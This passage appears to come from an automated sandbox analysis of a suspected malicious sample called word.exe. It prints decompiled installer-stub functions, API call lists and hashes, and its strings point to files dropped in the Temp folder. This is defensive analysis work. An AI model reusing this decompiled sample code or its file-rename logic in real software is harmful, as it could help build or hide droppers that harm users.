                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                    • String ID: "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx$N
                                    • API String ID: 3103080414-3302949443
                                    • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                    • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                    • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                    • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                    0x004062ae
                                    0x004062b7
                                    0x004062be
                                    0x004062c8
                                    0x004062dc
                                    0x00406304
                                    0x0040630b
                                    0x0040630f
                                    0x00406313
                                    0x00406333
                                    0x0040633a
                                    0x00406344
                                    0x00406351
                                    0x00406356
                                    0x0040635b
                                    0x0040635f
                                    0x0040636e
                                    0x00406370
                                    0x0040637d
                                    0x00406381
                                    0x0040641c
                                    0x00000000
                                    0x00406397
                                    0x004063a4
                                    0x004063c8
                                    0x004063cc
                                    0x004063eb
                                    0x004063ef
                                    0x004063ef
                                    0x004063f1
                                    0x004063fa
                                    0x00406405
                                    0x00406410
                                    0x00406416
                                    0x00000000
                                    0x00406416
                                    0x004063ce
                                    0x004063d1
                                    0x004063dc
                                    0x004063d8
                                    0x004063da
                                    0x004063db
                                    0x004063db
                                    0x004063e3
                                    0x004063e5
                                    0x00000000
                                    0x004063e5
                                    0x004063af
                                    0x004063b5
                                    0x00000000
                                    0x004063b5
                                    0x00406381
                                    0x0040635f
                                    0x004062de
                                    0x004062e9
                                    0x004062f2
                                    0x004062f6
                                    0x00000000
                                    0x00000000
                                    0x004062f6
                                    0x00406427

                                    APIs
                                    • CloseHandle.KERNEL32(00000000), ref: 004062E9
                                    • GetShortPathNameW.KERNEL32 ref: 004062F2
                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                    • GetShortPathNameW.KERNEL32 ref: 0040630F
                                    • wsprintfA.USER32 ref: 0040632D
                                    • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                    • GlobalFree.KERNEL32(00000000), ref: 00406416
                                    • CloseHandle.KERNEL32(00000000), ref: 0040641D
                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 0040615C
                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                    • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                    • API String ID: 2171350718-2295842750
                                    • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                    • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                    • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                    • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 90%
                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                    0x0040100a
                                    0x00401039
                                    0x00401047
                                    0x0040104d
                                    0x00401051
                                    0x0040105b
                                    0x00401061
                                    0x00401064
                                    0x004010f3
                                    0x00401089
                                    0x0040108c
                                    0x004010a6
                                    0x004010bd
                                    0x004010cc
                                    0x004010cf
                                    0x004010d5
                                    0x004010d9
                                    0x004010e4
                                    0x004010ed
                                    0x004010ef
                                    0x004010ef
                                    0x00401100
                                    0x00401105
                                    0x0040110d
                                    0x00401110
                                    0x00401112
                                    0x00401118
                                    0x0040111f
                                    0x00401126
                                    0x00401130
                                    0x00401142
                                    0x00401156
                                    0x00401160
                                    0x00401165
                                    0x00401165
                                    0x00401110
                                    0x0040116e
                                    0x00000000
                                    0x00401178
                                    0x00401010
                                    0x00401013
                                    0x00401015
                                    0x0040101f
                                    0x0040101f
                                    0x00000000

                                    APIs
                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                    • BeginPaint.USER32(?,?), ref: 00401047
                                    • GetClientRect.USER32 ref: 0040105B
                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                    • FillRect.USER32 ref: 004010E4
                                    • DeleteObject.GDI32(?), ref: 004010ED
                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                    • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                    • DeleteObject.GDI32(?), ref: 00401165
                                    • EndPaint.USER32(?,?), ref: 0040116E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                    • String ID: F
                                    • API String ID: 941294808-1304234792
                                    • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                    • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                    • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                    • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                    0x004066a5
                                    0x004066a5
                                    0x004066a5
                                    0x004066ab
                                    0x004066b0
                                    0x004066c1
                                    0x004066c1
                                    0x004066c9
                                    0x004066ca
                                    0x004066cb
                                    0x004066cc
                                    0x004066cf
                                    0x004066d7
                                    0x004066d9
                                    0x004066ea
                                    0x004066ed
                                    0x004066ed
                                    0x004066f1
                                    0x004066f7
                                    0x004066fa
                                    0x004068d5
                                    0x004068d5
                                    0x004068e0
                                    0x004068ec
                                    0x004068ec
                                    0x00000000
                                    0x00406700
                                    0x00406705
                                    0x0040671a
                                    0x0040671b
                                    0x00406721
                                    0x004068b3
                                    0x004068c1
                                    0x004068c4
                                    0x004068c4
                                    0x004068b5
                                    0x004068b8
                                    0x004068bb
                                    0x004068bd
                                    0x004068bd
                                    0x004068c6
                                    0x004068c6
                                    0x004068cc
                                    0x004068cf
                                    0x00406702
                                    0x00000000
                                    0x00406702
                                    0x00000000
                                    0x004068cf
                                    0x00406727
                                    0x0040672a
                                    0x00406739
                                    0x00406740
                                    0x0040674c
                                    0x0040674f
                                    0x00406752
                                    0x00406753
                                    0x00406758
                                    0x0040675e
                                    0x00406761
                                    0x00406764
                                    0x00406857
                                    0x0040685c
                                    0x0040688f
                                    0x00406894
                                    0x00406899
                                    0x0040689e
                                    0x0040689e
                                    0x004068a3
                                    0x004068a9
                                    0x004068ac
                                    0x00000000
                                    0x004068ac
                                    0x0040685e
                                    0x00406861
                                    0x00406864
                                    0x00406879
                                    0x00406880
                                    0x00406866
                                    0x0040686d
                                    0x0040686d
                                    0x00406888
                                    0x0040688b
                                    0x0040684f
                                    0x00406850
                                    0x00406850
                                    0x00000000
                                    0x0040688b
                                    0x00406771
                                    0x00406775
                                    0x00406775
                                    0x00406776
                                    0x00406778
                                    0x004067b5
                                    0x004067b8
                                    0x004067c8
                                    0x004067cb
                                    0x004067d3
                                    0x004067d9
                                    0x004067d9
                                    0x00406834
                                    0x00406834
                                    0x00406836
                                    0x00000000
                                    0x00000000
                                    0x004067dd
                                    0x004067e2
                                    0x004067e3
                                    0x004067e5
                                    0x004067fc
                                    0x0040680a
                                    0x00406810
                                    0x00406812
                                    0x00406830
                                    0x00406830
                                    0x00406830
                                    0x00000000
                                    0x00406830
                                    0x00406818
                                    0x00406821
                                    0x00406824
                                    0x0040682a
                                    0x0040682e
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040682e
                                    0x004067f6
                                    0x004067f8
                                    0x004067fa
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004067fa
                                    0x00000000
                                    0x00406834
                                    0x004067c0
                                    0x00000000
                                    0x0040677a
                                    0x00406798
                                    0x004067a1
                                    0x0040683e
                                    0x00406842
                                    0x0040684a
                                    0x0040684a
                                    0x00000000
                                    0x00406842
                                    0x004067ab
                                    0x00406838
                                    0x0040683c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040683c
                                    0x00406778
                                    0x00000000
                                    0x00406705

                                    APIs
                                    • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,00000400), ref: 004067C0
                                    • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                    • lstrcatW.KERNEL32 ref: 0040684A
                                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Directory$SystemWindowslstrcatlstrlen
                                    • String ID: "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                    • API String ID: 4260037668-2493358276
                                    • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                    • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                    • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                    • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                    0x004056d0
                                    0x004056da
                                    0x004056df
                                    0x004056e5
                                    0x004056f0
                                    0x004056f3
                                    0x004056f6
                                    0x004056fc
                                    0x004056fc
                                    0x00405702
                                    0x0040570a
                                    0x0040570d
                                    0x0040572a
                                    0x0040572e
                                    0x00405737
                                    0x00405737
                                    0x00405741
                                    0x0040574a
                                    0x00405756
                                    0x0040575d
                                    0x00405761
                                    0x00405764
                                    0x00405777
                                    0x00405785
                                    0x00405785
                                    0x00405789
                                    0x0040578b
                                    0x0040578e
                                    0x00000000
                                    0x0040578e
                                    0x0040570f
                                    0x00405717
                                    0x0040571f
                                    0x00405725
                                    0x00000000
                                    0x00405725
                                    0x0040571f
                                    0x0040570d
                                    0x0040579a

                                    APIs
                                    • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                    • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                    • lstrcatW.KERNEL32 ref: 00405725
                                    • SetWindowTextW.USER32 ref: 00405737
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32 ref: 0040684A
                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
